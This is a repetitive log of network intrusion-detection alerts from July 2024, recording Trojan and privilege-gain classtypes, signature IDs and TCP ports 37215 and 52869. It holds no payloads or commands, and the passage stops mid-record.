                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.654173
                      SID:2829579
                      Source Port:35068
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.817298
                      SID:2829579
                      Source Port:40146
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.355606
                      SID:2025132
                      Source Port:38094
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:25.783904
                      SID:2027339
                      Source Port:55398
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:12.806235
                      SID:2027339
                      Source Port:40150
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.084243
                      SID:2027339
                      Source Port:34282
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.445925
                      SID:2831300
                      Source Port:43088
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:45.432263
                      SID:2831300
                      Source Port:34106
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.151857
                      SID:2027339
                      Source Port:44722
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.058922
                      SID:2835222
                      Source Port:57500
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.875785
                      SID:2831300
                      Source Port:59312
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:53.697003
                      SID:2027339
                      Source Port:55182
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:11.703257
                      SID:2027339
                      Source Port:52068
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:03.112911
                      SID:2027339
                      Source Port:43688
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.616434
                      SID:2027339
                      Source Port:32946
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.443306
                      SID:2027339
                      Source Port:46994
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.636533
                      SID:2829579
                      Source Port:52904
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.066571
                      SID:2027339
                      Source Port:46598
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.203134
                      SID:2025132
                      Source Port:48192
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:11.816521
                      SID:2829579
                      Source Port:38808
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.976795
                      SID:2835222
                      Source Port:57148
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.301143
                      SID:2835222
                      Source Port:40256
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.212553
                      SID:2829579
                      Source Port:40552
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.132510
                      SID:2835222
                      Source Port:47976
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.098864
                      SID:2027339
                      Source Port:51472
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:55.716125
                      SID:2025132
                      Source Port:36576
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:03.159117
                      SID:2027339
                      Source Port:38730
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.590674
                      SID:2027339
                      Source Port:46584
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.611774
                      SID:2831300
                      Source Port:59634
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:07.236630
                      SID:2025132
                      Source Port:51288
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:20.156820
                      SID:2835222
                      Source Port:50504
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.322110
                      SID:2027339
                      Source Port:51984
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.607934
                      SID:2027339
                      Source Port:59822
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.700808
                      SID:2831300
                      Source Port:55012
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:46.913205
                      SID:2831300
                      Source Port:47070
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:31.974907
                      SID:2835222
                      Source Port:59308
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.096458
                      SID:2025132
                      Source Port:59468
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:04.147433
                      SID:2025132
                      Source Port:34558
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:20.591485
                      SID:2027339
                      Source Port:52570
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.094539
                      SID:2025132
                      Source Port:60544
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:59.168569
                      SID:2835222
                      Source Port:48142
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.055683
                      SID:2829579
                      Source Port:37208
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.272048
                      SID:2027339
                      Source Port:42216
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.228868
                      SID:2835222
                      Source Port:33362
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.255782
                      SID:2831300
                      Source Port:41630
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.243465
                      SID:2831300
                      Source Port:57270
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.470424
                      SID:2025132
                      Source Port:35058
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:16.745304
                      SID:2831300
                      Source Port:32840
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:57.429251
                      SID:2831300
                      Source Port:40982
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:01.881568
                      SID:2025132
                      Source Port:35860
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:01.320866
                      SID:2025132
                      Source Port:58754
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.740527
                      SID:2027339
                      Source Port:36918
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.557453
                      SID:2831300
                      Source Port:39592
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:45.098864
                      SID:2027339
                      Source Port:42266
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.059916
                      SID:2027339
                      Source Port:54154
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.867858
                      SID:2835222
                      Source Port:54490
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.156820
                      SID:2829579
                      Source Port:34000
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.555329
                      SID:2027339
                      Source Port:33944
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.340763
                      SID:2025132
                      Source Port:53506
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.762943
                      SID:2831300
                      Source Port:53296
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:04.098909
                      SID:2835222
                      Source Port:33448
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.204975
                      SID:2835222
                      Source Port:39976
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:01.929550
                      SID:2831300
                      Source Port:55272
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:07.075937
                      SID:2829579
                      Source Port:40714
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.400635
                      SID:2025132
                      Source Port:35110
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:57.221026
                      SID:2835222
                      Source Port:46136
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.567823
                      SID:2027339
                      Source Port:53212
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.329269
                      SID:2025132
                      Source Port:56996
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:50.901722
                      SID:2027339
                      Source Port:58344
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.374542
                      SID:2027339
                      Source Port:38602
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:54.693625
                      SID:2027339
                      Source Port:60830
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.164161
                      SID:2831300
                      Source Port:42482
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:34.064573
                      SID:2829579
                      Source Port:50696
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.104533
                      SID:2027339
                      Source Port:51844
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.559315
                      SID:2027339
                      Source Port:44538
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:25.940871
                      SID:2027339
                      Source Port:60192
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.653028
                      SID:2835222
                      Source Port:49014
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.660099
                      SID:2835222
                      Source Port:43594
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.667238
                      SID:2025132
                      Source Port:33240
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.372363
                      SID:2027339
                      Source Port:43162
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.631728
                      SID:2835222
                      Source Port:42374
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.838688
                      SID:2027339
                      Source Port:52806
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.467111
                      SID:2027339
                      Source Port:37268
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.758954
                      SID:2027339
                      Source Port:59620
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.500991
                      SID:2831300
                      Source Port:49978
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:08.693187
                      SID:2027339
                      Source Port:46180
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.916250
                      SID:2829579
                      Source Port:44788
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:55.870348
                      SID:2831300
                      Source Port:39428
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.687128
                      SID:2027339
                      Source Port:38254
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.483441
                      SID:2025132
                      Source Port:33916
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:45.775798
                      SID:2027339
                      Source Port:40262
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.563906
                      SID:2831300
                      Source Port:50832
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:53.392806
                      SID:2025132
                      Source Port:59554
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:02.104572
                      SID:2829579
                      Source Port:44882
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.603553
                      SID:2027339
                      Source Port:59972
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.082045
                      SID:2829579
                      Source Port:34088
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.078618
                      SID:2831300
                      Source Port:51042
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:00.635367
                      SID:2835222
                      Source Port:39392
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.636599
                      SID:2829579
                      Source Port:42506
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:04.133789
                      SID:2027339
                      Source Port:44138
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:12.811667
                      SID:2831300
                      Source Port:36698
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.656962
                      SID:2831300
                      Source Port:42998
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:24.916250
                      SID:2835222
                      Source Port:34934
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.452119
                      SID:2831300
                      Source Port:40286
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.142802
                      SID:2025132
                      Source Port:39466
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:53.909434
                      SID:2831300
                      Source Port:46270
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:54.277123
                      SID:2027339
                      Source Port:55390
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.104571
                      SID:2829579
                      Source Port:52394
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:10.501913
                      SID:2025132
                      Source Port:55566
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:51.790169
                      SID:2027339
                      Source Port:32904
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:25.965816
                      SID:2025132
                      Source Port:56820
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:01.171532
                      SID:2025132
                      Source Port:38296
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.688831
                      SID:2831300
                      Source Port:35844
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:48.036012
                      SID:2831300
                      Source Port:46612
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:07.062666
                      SID:2829579
                      Source Port:41676
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.915641
                      SID:2025132
                      Source Port:57594
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.328264
                      SID:2027339
                      Source Port:39722
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.620386
                      SID:2027339
                      Source Port:49108
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.222207
                      SID:2835222
                      Source Port:39796
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.475010
                      SID:2025132
                      Source Port:39358
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:12.806839
                      SID:2831300
                      Source Port:54258
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:54.277122
                      SID:2027339
                      Source Port:55422
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:25.275555
                      SID:2027339
                      Source Port:46150
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.048214
                      SID:2835222
                      Source Port:35414
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.667513
                      SID:2831300
                      Source Port:55916
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.763925
                      SID:2025132
                      Source Port:48326
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:59.178062
                      SID:2829579
                      Source Port:34032
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.312234
                      SID:2027339
                      Source Port:47832
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.805449
                      SID:2025132
                      Source Port:44524
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.572197
                      SID:2831300
                      Source Port:41398
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:08.594120
                      SID:2027339
                      Source Port:60104
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:04.520145
                      SID:2025132
                      Source Port:50896
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:53.099889
                      SID:2027339
                      Source Port:38954
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.909668
                      SID:2027339
                      Source Port:37660
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.825081
                      SID:2027339
                      Source Port:59162
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.079114
                      SID:2829579
                      Source Port:53940
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.772926
                      SID:2025132
                      Source Port:56254
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.620788
                      SID:2831300
                      Source Port:39266
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:48.970191
                      SID:2831300
                      Source Port:34126
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:52.914136
                      SID:2027339
                      Source Port:40474
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.222164
                      SID:2835222
                      Source Port:57480
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.893328
                      SID:2831300
                      Source Port:58992
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:03.175286
                      SID:2025132
                      Source Port:50620
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:47.856443
                      SID:2027339
                      Source Port:41204
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:11.743968
                      SID:2025132
                      Source Port:37572
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:58.892811
                      SID:2027339
                      Source Port:44010
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.999794
                      SID:2027339
                      Source Port:39764
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.329268
                      SID:2025132
                      Source Port:50588
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:46.929722
                      SID:2027339
                      Source Port:40550
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.143923
                      SID:2831300
                      Source Port:43004
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.800757
                      SID:2831300
                      Source Port:41210
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:53.428577
                      SID:2025132
                      Source Port:51684
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:45.485100
                      SID:2831300
                      Source Port:54638
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:07.016889
                      SID:2829579
                      Source Port:55088
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.221748
                      SID:2829579
                      Source Port:39456
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:25.715288
                      SID:2025132
                      Source Port:55744
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:26.014513
                      SID:2025132
                      Source Port:59542
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.660016
                      SID:2027339
                      Source Port:57142
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.868178
                      SID:2025132
                      Source Port:47262
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:04.637063
                      SID:2025132
                      Source Port:54854
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:24.060711
                      SID:2025132
                      Source Port:46302
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.935667
                      SID:2027339
                      Source Port:53490
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.677519
                      SID:2829579
                      Source Port:44504
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.043784
                      SID:2829579
                      Source Port:57248
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.655109
                      SID:2831300
                      Source Port:54774
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:06.738802
                      SID:2025132
                      Source Port:59328
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.600114
                      SID:2831300
                      Source Port:38226
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:49.329746
                      SID:2027339
                      Source Port:53542
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:25.787139
                      SID:2027339
                      Source Port:49954
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.286738
                      SID:2829579
                      Source Port:48528
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.048618
                      SID:2829579
                      Source Port:41346
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.366269
                      SID:2025132
                      Source Port:59642
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:06.994337
                      SID:2829579
                      Source Port:41576
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.739204
                      SID:2025132
                      Source Port:47310
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.944699
                      SID:2027339
                      Source Port:53900
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.646615
                      SID:2831300
                      Source Port:51990
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:00:59.153608
                      SID:2829579
                      Source Port:34534
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.632574
                      SID:2831300
                      Source Port:49030
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:41.263141
                      SID:2027339
                      Source Port:60330
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:04.592319
                      SID:2027339
                      Source Port:37212
